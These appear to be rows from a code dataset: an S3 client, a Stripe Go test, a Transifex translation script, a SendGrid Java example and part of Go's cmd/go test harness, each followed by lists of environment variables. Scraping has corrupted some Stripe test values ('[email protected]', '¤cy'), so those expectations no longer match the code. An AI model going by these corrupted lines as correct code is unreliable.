s3_obj = self._s3_file_query(cloud_path)
if s3_obj is None:
return None
# since S3 only returns files when filtering objects:
# if the first item key is equal to the path key, this is a file
if s3_obj.key == cloud_path.key:
# "fake" directories on S3 can be created in the console UI
# these are 0-size keys that end in `/`
# Ref: https://github.com/boto/boto3/issues/377
if s3_obj.key.endswith("/") and s3_obj.content_length == 0:
return "dir"
else:
return "file"
else:
return "dir"
def _exists(self, cloud_path: S3Path) -> bool:
return self._s3_file_query(cloud_path) is not None
def _s3_file_query(self, cloud_path: S3Path):
"""Boto3 query used for quick checks of existence and if path is file/dir"""
# first check if this is an object that we can access directly
try:
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
obj.load()
return obj
# else, confirm it is a dir by filtering to the first item under the prefix
except ClientError:
return next(
(
obj
for obj in (
self.s3.Bucket(cloud_path.bucket)
.objects.filter(Prefix=cloud_path.key)
.limit(1)
)
),
None,
)
def _list_dir(self, cloud_path: S3Path, recursive=False) -> Iterable[S3Path]:
bucket = self.s3.Bucket(cloud_path.bucket)
prefix = cloud_path.key
if prefix and not prefix.endswith("/"):
prefix += "/"
yielded_dirs = set()
if recursive:
for o in bucket.objects.filter(Prefix=prefix):
# get directory from this path
for parent in PurePosixPath(o.key[len(prefix) :]).parents:
# if we haven't surfaced their directory already
if parent not in yielded_dirs and str(parent) != ".":
yield self.CloudPath(f"s3://{cloud_path.bucket}/{prefix}{parent}")
yielded_dirs.add(parent)
yield self.CloudPath(f"s3://{o.bucket_name}/{o.key}")
else:
# non recursive is best done with old client API rather than resource
paginator = self.client.get_paginator("list_objects")
for result in paginator.paginate(
Bucket=cloud_path.bucket, Prefix=prefix, Delimiter="/"
):
# sub directory names
for result_prefix in result.get("CommonPrefixes", []):
yield self.CloudPath(f"s3://{cloud_path.bucket}/{result_prefix.get('Prefix')}")
# files in the directory
for result_key in result.get("Contents", []):
if result_key.get('Size') > 0:
yield self.CloudPath(f"s3://{cloud_path.bucket}/{result_key.get('Key')}")
def _move_file(self, src: S3Path, dst: S3Path, remove_src: bool = True) -> S3Path:
# just a touch, so "REPLACE" metadata
if src == dst:
o = self.s3.Object(src.bucket, src.key)
o.copy_from(
CopySource={"Bucket": src.bucket, "Key": src.key},
Metadata=self._get_metadata(src).get("extra", {}),
MetadataDirective="REPLACE",
)
else:
target = self.s3.Object(dst.bucket, dst.key)
target.copy({"Bucket": src.bucket, "Key": src.key})
if remove_src:
self._remove(src)
return dst
def _remove(self, cloud_path: S3Path) -> None:
try:
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
# will throw if not a file
obj.load()
resp = obj.delete()
assert resp.get("ResponseMetadata").get("HTTPStatusCode") == 204
except ClientError:
# try to delete as a directory instead
bucket = self.s3.Bucket(cloud_path.bucket)
prefix = cloud_path.key
if prefix and not prefix.endswith("/"):
prefix += "/"
resp = bucket.objects.filter(Prefix=prefix).delete()
# ensure directory deleted; if cloud_path did not exist at all
# resp will be [], so no need to check success
if resp:
assert resp[0].get("ResponseMetadata").get("HTTPStatusCode") == 200
def _upload_file(self, local_path: Union[str, os.PathLike], cloud_path: S3Path) -> S3Path:
obj = self.s3.Object(cloud_path.bucket, cloud_path.key)
obj.upload_file(str(local_path), Config=self.boto3_transfer_config)
return cloud_path
S3Client.S3Path = S3Client.CloudPath # type: ignore
| [] | [] | ["AWS_ENDPOINT_URL"] | [] | ["AWS_ENDPOINT_URL"] | python | 1 | 0 |
stripe_test.go | package stripeutil
import (
"encoding/json"
"os"
"strconv"
"testing"
"time"
stripelib "github.com/stripe/stripe-go/v72"
)
func Test_Params(t *testing.T) {
tests := []struct {
params Params
expected string
}{
{
Params{"email": "[email protected]"},
"email=me%40example.com",
},
{
Params{
"invoice_settings": Params{
"default_payment_method": "pm_123456",
},
},
"invoice_settings[default_payment_method]=pm_123456",
},
{
Params{
"customer": "cu_123456",
"items": []Params{
{"price": "pr_123456"},
},
"expand": []string{"latest_invoice.payment_intent"},
},
"customer=cu_123456&expand[0]=latest_invoice.payment_intent&items[0][price]=pr_123456",
},
{
Params{
"amount": 2000,
"currency": "gbp",
"payment_method_types": []string{"card"},
},
"amount=2000¤cy=gbp&payment_method_types[0]=card",
},
}
for i, test := range tests {
encoded := test.params.Encode()
if encoded != test.expected {
t.Errorf("tests[%d] - unexpected encoding, expected=%q, got=%q\n", i, test.expected, encoded)
}
}
}
func Test_Stripe(t *testing.T) {
secret := os.Getenv("STRIPE_SECRET")
price := os.Getenv("STRIPE_PRICE")
if secret == "" || price == "" {
t.Skip("STRIPE_SECRET and STRIPE_PRICE not set, skipping")
}
store := newTestStore()
stripe := New(secret, store)
c, err := stripe.Customer("[email protected]")
if err != nil {
t.Fatal(err)
}
resp, err := stripe.Post(paymentMethodEndpoint, Params{
"card": Params{
"number": "4242424242424242",
"exp_month": "12",
"exp_year": strconv.FormatInt(int64(time.Now().Add(time.Hour*24*365).Year()), 10),
"cvc": "111",
},
"type": "card",
})
if err != nil {
t.Fatal(err)
}
defer resp.Body.Close()
if !respCode2xx(resp.StatusCode) {
t.Fatal(stripe.Error(resp))
}
pm := &PaymentMethod{
PaymentMethod: &stripelib.PaymentMethod{},
}
json.NewDecoder(resp.Body).Decode(pm)
if err := pm.Attach(stripe, c); err != nil {
t.Fatal(err)
}
_, err = stripe.Subscribe(c, pm, Params{
"items": []Params{
{"price": price},
},
})
if err != nil {
t.Fatal(err)
}
if _, err := stripe.Unsubscribe(c); err != nil {
t.Fatal(err)
}
resp1, err := stripe.Delete(c.Endpoint())
if err != nil {
t.Fatal(err)
}
defer resp1.Body.Close()
if !respCode2xx(resp1.StatusCode) {
t.Fatal(stripe.Error(resp1))
}
}
| ["\"STRIPE_SECRET\"", "\"STRIPE_PRICE\""] | [] | ["STRIPE_SECRET", "STRIPE_PRICE"] | [] | ["STRIPE_SECRET", "STRIPE_PRICE"] | go | 2 | 0 |
tools/yaml_to_json.py | import os
import re
from pathlib import Path
from hashlib import md5
from slugify import slugify
import glob
import yaml
import json
import requests
PROJECT = 'avid-covider'
def calc_hash(s):
ret = md5(s.encode('utf8')).hexdigest()[:10]
return ret
HEB = re.compile('[א-ת]')
def has_hebrew(s):
return len(HEB.findall(s)) > 0
def get_field(x, f):
parts = f.split('.')
while len(parts) > 0:
p = parts.pop(0)
x = x.get(p, {})
return x
def get_uid(x, stack, index=None):
try:
FIELDS = ['name', 'wait.variable', 'say', 'switch.arg', 'do.cmd', 'do.variable', 'match', 'pattern', 'default', 'show']
values = [get_field(x, f) for f in FIELDS]
values = ','.join([str(v) for v in values if v is not None])
assert len(values) > 0
current_hash = ''.join(stack)
key = '{}|{}|{}'.format(current_hash, values, index)
ret = calc_hash(key)
return ret
except:
print(x, stack)
raise
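# Recursively walk the parsed script tree and give every node that has
# `steps` (and each of its steps) a deterministic uid, derived from selected
# field values plus the hash chain of its ancestors.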
def assign_ids(x, stack=[]):
if isinstance(x, dict):
uid = None
for k, v in x.items():
if k == 'steps':
uid = get_uid(x, stack)
for i, s in enumerate(v):
new_stack = stack + [uid, str(i)]
s['uid'] = get_uid(s, new_stack, i)
assign_ids(s, new_stack)
else:
assign_ids(v, stack)
if uid is not None:
x['uid'] = uid
elif isinstance(x, list):
for xx in x:
assign_ids(xx, stack)
else:
return
TRANSIFEX_TOKEN = os.environ.get('TRANSIFEX_TOKEN') or os.environ.get('TX_TOKEN')
LANGUAGES = ('ar', 'am', 'en', 'km-KH', 'ru', 'es', 'fr')
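# Generator: walks the script, yields (key, text) for every Hebrew string in
# one of `fields`, and replaces the string in place with a {'.tx': {...}}
# mapping of per-language translations (with '_' holding the original Hebrew)
# whenever a translation for that key exists.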
def assign_translations(x, stack, parent=None, parentkey=None, translations=None, fields=(), field_in_key=False):
if isinstance(x, dict):
key = None
if x.get('slug'):
stack.append(x['slug'])
elif x.get('name'):
stack.append(slugify(x['name']))
if 'uid' in x:
stack.append(x['uid'][:2])
for k, v in x.items():
if k == 'steps':
for s in v:
new_stack = stack + []
yield from assign_translations(s, new_stack,
parent=None, parentkey=None,
translations=translations, fields=fields, field_in_key=field_in_key)
else:
yield from assign_translations(v, stack[:],
parent=x, parentkey=k,
translations=translations, fields=fields, field_in_key=field_in_key
)
elif isinstance(x, list):
for index, xx in enumerate(x):
new_stack = stack + [index]
yield from assign_translations(xx, new_stack,
parent=x, parentkey=index,
translations=translations, fields=fields, field_in_key=field_in_key
)
elif isinstance(x, str):
if parent and parentkey is not None and has_hebrew(x):
if isinstance(parentkey, str) and parentkey not in fields:
return
if field_in_key:
key = '/'.join(str(s) for s in stack + [parentkey])
else:
key = '/'.join(str(s) for s in stack)
yield key, x
if key in translations:
parent[parentkey]={'.tx': dict(translations[key], _=x)}
# else:
# print('KEY NOT IN TX %s'% key)
def transifex_session():
s = requests.Session()
s.auth = ('api', TRANSIFEX_TOKEN)
return s
def transifex_slug(filename):
return '_'.join(filename.parts).replace('.', '_')
def push_translations(filename: Path, translations):
translations = dict(he=translations)
content = yaml.dump(translations, allow_unicode=True, indent=2, width=1000000)
slug = transifex_slug(filename)
s = transifex_session()
resp = s.get(f'https://www.transifex.com/api/2/project/{PROJECT}/resource/{slug}/')
if resp.status_code == requests.codes.ok:
print('Update file:')
data = dict(
content=content,
)
resp = s.put(
f'https://www.transifex.com/api/2/project/{PROJECT}/resource/{slug}/content/',
json=data
)
print(resp.status_code, resp.content[:50])
else:
print('New file:', slug)
data = dict(
slug=slug,
name=str(filename),
accept_translations=True,
i18n_type='YAML_GENERIC',
content=content,
)
resp = s.post(
f'https://www.transifex.com/api/2/project/{PROJECT}/resources/',
json=data
)
print(resp.status_code, resp.content[:100])
def pull_translations(lang, filename):
s = transifex_session()
slug = transifex_slug(filename)
url = f'https://www.transifex.com/api/2/project/{PROJECT}/resource/{slug}/translation/{lang}/'
try:
translations = s.get(url).json()
except json.decoder.JSONDecodeError:
print('No data from %s' % url)
return {}
translations = yaml.load(translations['content'], Loader=yaml.BaseLoader)['he']
translations = dict((k, v) for k, v in translations.items() if v)
return translations
def write_ical(title, body, path):
path = 'dist/avid-covider/{}assets/corona_reminder.ics'.format(path)
with open(path, 'w', encoding='utf8') as ics:
ics.write('''BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Microsoft Corporation//Outlook 12.0 MIMEDIR//EN
METHOD:PUBLISH
CALSCALE:GREGORIAN
BEGIN:VTIMEZONE
TZID:Asia/Jerusalem
TZURL:http://tzurl.org/zoneinfo-outlook/Asia/Jerusalem
X-LIC-LOCATION:Asia/Jerusalem
BEGIN:DAYLIGHT
TZOFFSETFROM:+0200
TZOFFSETTO:+0300
TZNAME:EEST
DTSTART:19700329T000000
RRULE:FREQ=YEARLY;BYMONTH=3;BYDAY=-1SU
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:+0300
TZOFFSETTO:+0200
TZNAME:EET
DTSTART:19701025T000000
RRULE:FREQ=YEARLY;BYMONTH=10;BYDAY=-1SU
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:20200328T131636Z
UID:corona-israel-0001
DTSTART;TZID=Asia/Jerusalem:20200328T080000
RRULE:FREQ=DAILY
DTEND;TZID=Asia/Jerusalem:20200328T081500
SUMMARY:{title}
URL:https://coronaisrael.org/?source=calendar
DESCRIPTION:{body}
LOCATION:https://coronaisrael.org/?source=calendar
TRANSP:TRANSPARENT
X-MICROSOFT-CDO-BUSYSTATUS:FREE
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:{title}
TRIGGER:-PT0M
END:VALARM
END:VEVENT
END:VCALENDAR'''.format(title=title, body=body))
def create_assets(script):
translations = {}
for x in script['keys']:
translations[x['name']] = x['show'].get('.tx',{})
languages = [(x, x+'/') for x in LANGUAGES] + [('_', '')]
for lang, path in languages:
calendarTitle = translations['calendarTitle']
calendarTitle=calendarTitle.get(lang, calendarTitle.get('_'))
calendarBody = translations['calendarBody']
calendarBody=calendarBody.get(lang, calendarBody.get('_'))
try:
write_ical(calendarTitle, calendarBody, path)
except Exception as e:
print('Failed to write ical %s' % e)
if __name__=='__main__':
f_in = Path('scripts/script.yaml')
scripts = yaml.load(f_in.open(), Loader=yaml.BaseLoader)
assign_ids(scripts, [str(f_in)])
if TRANSIFEX_TOKEN:
rx_translations = {}
for lang in LANGUAGES:
lang_translations = pull_translations(lang, f_in)
for key, value in lang_translations.items():
rx_translations.setdefault(key, {})[lang] = value
tx_translations = {}
for script in scripts:
for k, v in assign_translations(script, [], translations=rx_translations, fields=('show', 'say', 'placeholder')):
assert tx_translations.get(k, v) == v, 'Duplicate key %s (v=%r, tx[k]==%r)' % (k, v, tx_translations[k])
tx_translations[k] = v
print(k, v)
push_translations(f_in, tx_translations)
create_assets(scripts[-1])
scripts = dict(s=scripts)
f_out = Path('src/app/script.ts')
f_out.open('w').write('''
/* tslint:disable */
export const script = {};
'''.format(json.dumps(
scripts, ensure_ascii=False, sort_keys=True, indent=2)
)
)
| [] | [] | ["TX_TOKEN", "TRANSIFEX_TOKEN"] | [] | ["TX_TOKEN", "TRANSIFEX_TOKEN"] | python | 2 | 0 |
examples/subusers/DeleteMonitorSettings.java | import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.sendgrid.*;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
//////////////////////////////////////////////////////////////////
// Delete monitor settings
// DELETE /subusers/{subuser_name}/monitor
public class DeleteMonitorSettings {
public static void main(String[] args) throws IOException {
try {
SendGrid sg = new SendGrid(System.getenv("SENDGRID_API_KEY"));
Request request = new Request();
request.setMethod(Method.DELETE);
request.setEndpoint("subusers/{subuser_name}/monitor");
Response response = sg.api(request);
System.out.println(response.getStatusCode());
System.out.println(response.getBody());
System.out.println(response.getHeaders());
} catch (IOException ex) {
throw ex;
}
}
} | ["\"SENDGRID_API_KEY\""] | [] | ["SENDGRID_API_KEY"] | [] | ["SENDGRID_API_KEY"] | java | 1 | 0 |
src/cmd/go/go_test.go | // Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package main_test
import (
"bytes"
"debug/elf"
"debug/macho"
"debug/pe"
"encoding/binary"
"flag"
"fmt"
"go/format"
"internal/race"
"internal/testenv"
"io"
"io/fs"
"log"
"os"
"os/exec"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"testing"
"time"
"cmd/go/internal/cache"
"cmd/go/internal/cfg"
"cmd/go/internal/robustio"
"cmd/internal/sys"
)
func init() {
// GOVCS defaults to public:git|hg,private:all,
// which breaks many tests here - they can't use non-git, non-hg VCS at all!
// Change to fully permissive.
// The tests of the GOVCS setting itself are in ../../testdata/script/govcs.txt.
os.Setenv("GOVCS", "*:all")
}
var (
canRace = false // whether we can run the race detector
canCgo = false // whether we can use cgo
canMSan = false // whether we can run the memory sanitizer
canASan = false // whether we can run the address sanitizer
)
var exeSuffix string = func() string {
if runtime.GOOS == "windows" {
return ".exe"
}
return ""
}()
func tooSlow(t *testing.T) {
if testing.Short() {
// In -short mode; skip test, except run it on the {darwin,linux,windows}/amd64 builders.
if testenv.Builder() != "" && runtime.GOARCH == "amd64" && (runtime.GOOS == "linux" || runtime.GOOS == "darwin" || runtime.GOOS == "windows") {
return
}
t.Helper()
t.Skip("skipping test in -short mode")
}
}
// testGOROOT is the GOROOT to use when running testgo, a cmd/go binary
// build from this process's current GOROOT, but run from a different
// (temp) directory.
var testGOROOT string
var testGOCACHE string
var testGo string
var testTmpDir string
var testBin string
// The TestMain function creates a go command for testing purposes and
// deletes it after the tests have been run.
func TestMain(m *testing.M) {
// $GO_GCFLAGS a compiler debug flag known to cmd/dist, make.bash, etc.
// It is not a standard go command flag; use os.Getenv, not cfg.Getenv.
if os.Getenv("GO_GCFLAGS") != "" {
fmt.Fprintf(os.Stderr, "testing: warning: no tests to run\n") // magic string for cmd/go
fmt.Printf("cmd/go test is not compatible with $GO_GCFLAGS being set\n")
fmt.Printf("SKIP\n")
return
}
flag.Parse()
if *proxyAddr != "" {
StartProxy()
select {}
}
// Run with a temporary TMPDIR to check that the tests don't
// leave anything behind.
topTmpdir, err := os.MkdirTemp("", "cmd-go-test-")
if err != nil {
log.Fatal(err)
}
if !*testWork {
defer removeAll(topTmpdir)
}
os.Setenv(tempEnvName(), topTmpdir)
dir, err := os.MkdirTemp(topTmpdir, "tmpdir")
if err != nil {
log.Fatal(err)
}
testTmpDir = dir
if !*testWork {
defer removeAll(testTmpDir)
}
testGOCACHE = cache.DefaultDir()
if testenv.HasGoBuild() {
testBin = filepath.Join(testTmpDir, "testbin")
if err := os.Mkdir(testBin, 0777); err != nil {
log.Fatal(err)
}
testGo = filepath.Join(testBin, "go"+exeSuffix)
args := []string{"build", "-tags", "testgo", "-o", testGo}
if race.Enabled {
args = append(args, "-race")
}
gotool, err := testenv.GoTool()
if err != nil {
fmt.Fprintln(os.Stderr, err)
os.Exit(2)
}
goEnv := func(name string) string {
out, err := exec.Command(gotool, "env", name).CombinedOutput()
if err != nil {
fmt.Fprintf(os.Stderr, "go env %s: %v\n%s", name, err, out)
os.Exit(2)
}
return strings.TrimSpace(string(out))
}
testGOROOT = goEnv("GOROOT")
os.Setenv("TESTGO_GOROOT", testGOROOT)
// Ensure that GOROOT is set explicitly.
// Otherwise, if the toolchain was built with GOROOT_FINAL set but has not
// yet been moved to its final location, programs that invoke runtime.GOROOT
// may accidentally use the wrong path.
os.Setenv("GOROOT", testGOROOT)
// The whole GOROOT/pkg tree was installed using the GOHOSTOS/GOHOSTARCH
// toolchain (installed in GOROOT/pkg/tool/GOHOSTOS_GOHOSTARCH).
// The testgo.exe we are about to create will be built for GOOS/GOARCH,
// which means it will use the GOOS/GOARCH toolchain
// (installed in GOROOT/pkg/tool/GOOS_GOARCH).
// If these are not the same toolchain, then the entire standard library
// will look out of date (the compilers in those two different tool directories
// are built for different architectures and have different build IDs),
// which will cause many tests to do unnecessary rebuilds and some
// tests to attempt to overwrite the installed standard library.
// Bail out entirely in this case.
hostGOOS := goEnv("GOHOSTOS")
hostGOARCH := goEnv("GOHOSTARCH")
if hostGOOS != runtime.GOOS || hostGOARCH != runtime.GOARCH {
fmt.Fprintf(os.Stderr, "testing: warning: no tests to run\n") // magic string for cmd/go
fmt.Printf("cmd/go test is not compatible with GOOS/GOARCH != GOHOSTOS/GOHOSTARCH (%s/%s != %s/%s)\n", runtime.GOOS, runtime.GOARCH, hostGOOS, hostGOARCH)
fmt.Printf("SKIP\n")
return
}
buildCmd := exec.Command(gotool, args...)
buildCmd.Env = append(os.Environ(), "GOFLAGS=-mod=vendor")
out, err := buildCmd.CombinedOutput()
if err != nil {
fmt.Fprintf(os.Stderr, "building testgo failed: %v\n%s", err, out)
os.Exit(2)
}
cmd := exec.Command(testGo, "env", "CGO_ENABLED")
cmd.Stderr = new(strings.Builder)
if out, err := cmd.Output(); err != nil {
fmt.Fprintf(os.Stderr, "running testgo failed: %v\n%s", err, cmd.Stderr)
os.Exit(2)
} else {
canCgo, err = strconv.ParseBool(strings.TrimSpace(string(out)))
if err != nil {
fmt.Fprintf(os.Stderr, "can't parse go env CGO_ENABLED output: %v\n", strings.TrimSpace(string(out)))
}
}
out, err = exec.Command(gotool, "env", "GOCACHE").CombinedOutput()
if err != nil {
fmt.Fprintf(os.Stderr, "could not find testing GOCACHE: %v\n%s", err, out)
os.Exit(2)
}
testGOCACHE = strings.TrimSpace(string(out))
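// Probe which of the race detector and the memory/address sanitizers
// can be used with this toolchain on this host.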
canMSan = canCgo && sys.MSanSupported(runtime.GOOS, runtime.GOARCH)
canASan = canCgo && sys.ASanSupported(runtime.GOOS, runtime.GOARCH)
canRace = canCgo && sys.RaceDetectorSupported(runtime.GOOS, runtime.GOARCH)
// The race detector doesn't work on Alpine Linux:
// golang.org/issue/14481
// gccgo does not support the race detector.
if isAlpineLinux() || runtime.Compiler == "gccgo" {
canRace = false
}
}
// Don't let these environment variables confuse the test.
os.Setenv("GOENV", "off")
os.Unsetenv("GOFLAGS")
os.Unsetenv("GOBIN")
os.Unsetenv("GOPATH")
os.Unsetenv("GIT_ALLOW_PROTOCOL")
os.Setenv("HOME", "/test-go-home-does-not-exist")
// On some systems the default C compiler is ccache.
// Setting HOME to a non-existent directory will break
// those systems. Disable ccache and use real compiler. Issue 17668.
os.Setenv("CCACHE_DISABLE", "1")
if cfg.Getenv("GOCACHE") == "" {
os.Setenv("GOCACHE", testGOCACHE) // because $HOME is gone
}
r := m.Run()
if !*testWork {
removeAll(testTmpDir) // os.Exit won't run defer
}
if !*testWork {
// There shouldn't be anything left in topTmpdir.
dirf, err := os.Open(topTmpdir)
if err != nil {
log.Fatal(err)
}
names, err := dirf.Readdirnames(0)
if err != nil {
log.Fatal(err)
}
if len(names) > 0 {
log.Fatalf("unexpected files left in tmpdir: %v", names)
}
removeAll(topTmpdir)
}
os.Exit(r)
}
func isAlpineLinux() bool {
if runtime.GOOS != "linux" {
return false
}
fi, err := os.Lstat("/etc/alpine-release")
return err == nil && fi.Mode().IsRegular()
}
// The length of an mtime tick on this system. This is an estimate of
// how long we need to sleep to ensure that the mtime of two files is
// different.
// We used to try to be clever but that didn't always work (see golang.org/issue/12205).
var mtimeTick time.Duration = 1 * time.Second
// Manage a single run of the testgo binary.
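//
// An illustrative (not exhaustive) use within a test:
//
//	tg := testgo(t)
//	defer tg.cleanup()
//	tg.parallel()
//	tg.setenv("GOPATH", tg.path("."))
//	tg.run("build", "p")
//	tg.grepStderrNot("error", "build should not report errors")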
type testgoData struct {
t *testing.T
temps []string
env []string
tempdir string
ran bool
inParallel bool
stdout, stderr bytes.Buffer
execDir string // dir for tg.run
}
// skipIfGccgo skips the test if using gccgo.
func skipIfGccgo(t *testing.T, msg string) {
if runtime.Compiler == "gccgo" {
t.Skipf("skipping test not supported on gccgo: %s", msg)
}
}
// testgo sets up for a test that runs testgo.
func testgo(t *testing.T) *testgoData {
t.Helper()
testenv.MustHaveGoBuild(t)
testenv.SkipIfShortAndSlow(t)
return &testgoData{t: t}
}
// must gives a fatal error if err is not nil.
func (tg *testgoData) must(err error) {
tg.t.Helper()
if err != nil {
tg.t.Fatal(err)
}
}
// check gives a test non-fatal error if err is not nil.
func (tg *testgoData) check(err error) {
tg.t.Helper()
if err != nil {
tg.t.Error(err)
}
}
// parallel runs the test in parallel by calling t.Parallel.
func (tg *testgoData) parallel() {
tg.t.Helper()
if tg.ran {
tg.t.Fatal("internal testsuite error: call to parallel after run")
}
for _, e := range tg.env {
if strings.HasPrefix(e, "GOROOT=") || strings.HasPrefix(e, "GOPATH=") || strings.HasPrefix(e, "GOBIN=") {
val := e[strings.Index(e, "=")+1:]
if strings.HasPrefix(val, "testdata") || strings.HasPrefix(val, "./testdata") {
tg.t.Fatalf("internal testsuite error: call to parallel with testdata in environment (%s)", e)
}
}
}
tg.inParallel = true
tg.t.Parallel()
}
// pwd returns the current directory.
func (tg *testgoData) pwd() string {
tg.t.Helper()
wd, err := os.Getwd()
if err != nil {
tg.t.Fatalf("could not get working directory: %v", err)
}
return wd
}
// sleep sleeps for one tick, where a tick is a conservative estimate
// of how long it takes for a file modification to get a different
// mtime.
func (tg *testgoData) sleep() {
time.Sleep(mtimeTick)
}
// setenv sets an environment variable to use when running the test go
// command.
func (tg *testgoData) setenv(name, val string) {
tg.t.Helper()
if tg.inParallel && (name == "GOROOT" || name == "GOPATH" || name == "GOBIN") && (strings.HasPrefix(val, "testdata") || strings.HasPrefix(val, "./testdata")) {
tg.t.Fatalf("internal testsuite error: call to setenv with testdata (%s=%s) after parallel", name, val)
}
tg.unsetenv(name)
tg.env = append(tg.env, name+"="+val)
}
// unsetenv removes an environment variable.
func (tg *testgoData) unsetenv(name string) {
if tg.env == nil {
tg.env = append([]string(nil), os.Environ()...)
tg.env = append(tg.env, "GO111MODULE=off")
}
for i, v := range tg.env {
if strings.HasPrefix(v, name+"=") {
tg.env = append(tg.env[:i], tg.env[i+1:]...)
break
}
}
}
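// goTool returns the path of the go command built by TestMain for use in tests.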
func (tg *testgoData) goTool() string {
return testGo
}
// doRun runs the test go command, recording stdout and stderr and
// returning exit status.
func (tg *testgoData) doRun(args []string) error {
tg.t.Helper()
if tg.inParallel {
for _, arg := range args {
if strings.HasPrefix(arg, "testdata") || strings.HasPrefix(arg, "./testdata") {
tg.t.Fatal("internal testsuite error: parallel run using testdata")
}
}
}
hasGoroot := false
for _, v := range tg.env {
if strings.HasPrefix(v, "GOROOT=") {
hasGoroot = true
break
}
}
prog := tg.goTool()
if !hasGoroot {
tg.setenv("GOROOT", testGOROOT)
}
tg.t.Logf("running testgo %v", args)
cmd := exec.Command(prog, args...)
tg.stdout.Reset()
tg.stderr.Reset()
cmd.Dir = tg.execDir
cmd.Stdout = &tg.stdout
cmd.Stderr = &tg.stderr
cmd.Env = tg.env
status := cmd.Run()
if tg.stdout.Len() > 0 {
tg.t.Log("standard output:")
tg.t.Log(tg.stdout.String())
}
if tg.stderr.Len() > 0 {
tg.t.Log("standard error:")
tg.t.Log(tg.stderr.String())
}
tg.ran = true
return status
}
// run runs the test go command, and expects it to succeed.
func (tg *testgoData) run(args ...string) {
tg.t.Helper()
if status := tg.doRun(args); status != nil {
wd, _ := os.Getwd()
tg.t.Logf("go %v failed unexpectedly in %s: %v", args, wd, status)
tg.t.FailNow()
}
}
// runFail runs the test go command, and expects it to fail.
func (tg *testgoData) runFail(args ...string) {
tg.t.Helper()
if status := tg.doRun(args); status == nil {
tg.t.Fatal("testgo succeeded unexpectedly")
} else {
tg.t.Log("testgo failed as expected:", status)
}
}
// runGit runs a git command, and expects it to succeed.
func (tg *testgoData) runGit(dir string, args ...string) {
tg.t.Helper()
cmd := exec.Command("git", args...)
tg.stdout.Reset()
tg.stderr.Reset()
cmd.Stdout = &tg.stdout
cmd.Stderr = &tg.stderr
cmd.Dir = dir
cmd.Env = tg.env
status := cmd.Run()
if tg.stdout.Len() > 0 {
tg.t.Log("git standard output:")
tg.t.Log(tg.stdout.String())
}
if tg.stderr.Len() > 0 {
tg.t.Log("git standard error:")
tg.t.Log(tg.stderr.String())
}
if status != nil {
tg.t.Logf("git %v failed unexpectedly: %v", args, status)
tg.t.FailNow()
}
}
// getStdout returns standard output of the testgo run as a string.
func (tg *testgoData) getStdout() string {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: stdout called before run")
}
return tg.stdout.String()
}
// getStderr returns standard error of the testgo run as a string.
func (tg *testgoData) getStderr() string {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: stdout called before run")
}
return tg.stderr.String()
}
// doGrepMatch looks for a regular expression in a buffer, and returns
// whether it is found. The regular expression is matched against
// each line separately, as with the grep command.
func (tg *testgoData) doGrepMatch(match string, b *bytes.Buffer) bool {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: grep called before run")
}
re := regexp.MustCompile(match)
for _, ln := range bytes.Split(b.Bytes(), []byte{'\n'}) {
if re.Match(ln) {
return true
}
}
return false
}
// doGrep looks for a regular expression in a buffer and fails if it
// is not found. The name argument is the name of the output we are
// searching, "output" or "error". The msg argument is logged on
// failure.
func (tg *testgoData) doGrep(match string, b *bytes.Buffer, name, msg string) {
tg.t.Helper()
if !tg.doGrepMatch(match, b) {
tg.t.Log(msg)
tg.t.Logf("pattern %v not found in standard %s", match, name)
tg.t.FailNow()
}
}
// grepStdout looks for a regular expression in the test run's
// standard output and fails, logging msg, if it is not found.
func (tg *testgoData) grepStdout(match, msg string) {
tg.t.Helper()
tg.doGrep(match, &tg.stdout, "output", msg)
}
// grepStderr looks for a regular expression in the test run's
// standard error and fails, logging msg, if it is not found.
func (tg *testgoData) grepStderr(match, msg string) {
tg.t.Helper()
tg.doGrep(match, &tg.stderr, "error", msg)
}
// grepBoth looks for a regular expression in the test run's standard
// output or standard error and fails, logging msg, if it is not found.
func (tg *testgoData) grepBoth(match, msg string) {
tg.t.Helper()
if !tg.doGrepMatch(match, &tg.stdout) && !tg.doGrepMatch(match, &tg.stderr) {
tg.t.Log(msg)
tg.t.Logf("pattern %v not found in standard output or standard error", match)
tg.t.FailNow()
}
}
// doGrepNot looks for a regular expression in a buffer and fails if
// it is found. The name and msg arguments are as for doGrep.
func (tg *testgoData) doGrepNot(match string, b *bytes.Buffer, name, msg string) {
tg.t.Helper()
if tg.doGrepMatch(match, b) {
tg.t.Log(msg)
tg.t.Logf("pattern %v found unexpectedly in standard %s", match, name)
tg.t.FailNow()
}
}
// grepStdoutNot looks for a regular expression in the test run's
// standard output and fails, logging msg, if it is found.
func (tg *testgoData) grepStdoutNot(match, msg string) {
tg.t.Helper()
tg.doGrepNot(match, &tg.stdout, "output", msg)
}
// grepStderrNot looks for a regular expression in the test run's
// standard error and fails, logging msg, if it is found.
func (tg *testgoData) grepStderrNot(match, msg string) {
tg.t.Helper()
tg.doGrepNot(match, &tg.stderr, "error", msg)
}
// grepBothNot looks for a regular expression in the test run's
// standard output or standard error and fails, logging msg, if it is
// found.
func (tg *testgoData) grepBothNot(match, msg string) {
tg.t.Helper()
if tg.doGrepMatch(match, &tg.stdout) || tg.doGrepMatch(match, &tg.stderr) {
tg.t.Log(msg)
tg.t.Fatalf("pattern %v found unexpectedly in standard output or standard error", match)
}
}
// doGrepCount counts the number of times a regexp is seen in a buffer.
func (tg *testgoData) doGrepCount(match string, b *bytes.Buffer) int {
tg.t.Helper()
if !tg.ran {
tg.t.Fatal("internal testsuite error: doGrepCount called before run")
}
re := regexp.MustCompile(match)
c := 0
for _, ln := range bytes.Split(b.Bytes(), []byte{'\n'}) {
if re.Match(ln) {
c++
}
}
return c
}
// grepCountBoth returns the number of times a regexp is seen in both
// standard output and standard error.
func (tg *testgoData) grepCountBoth(match string) int {
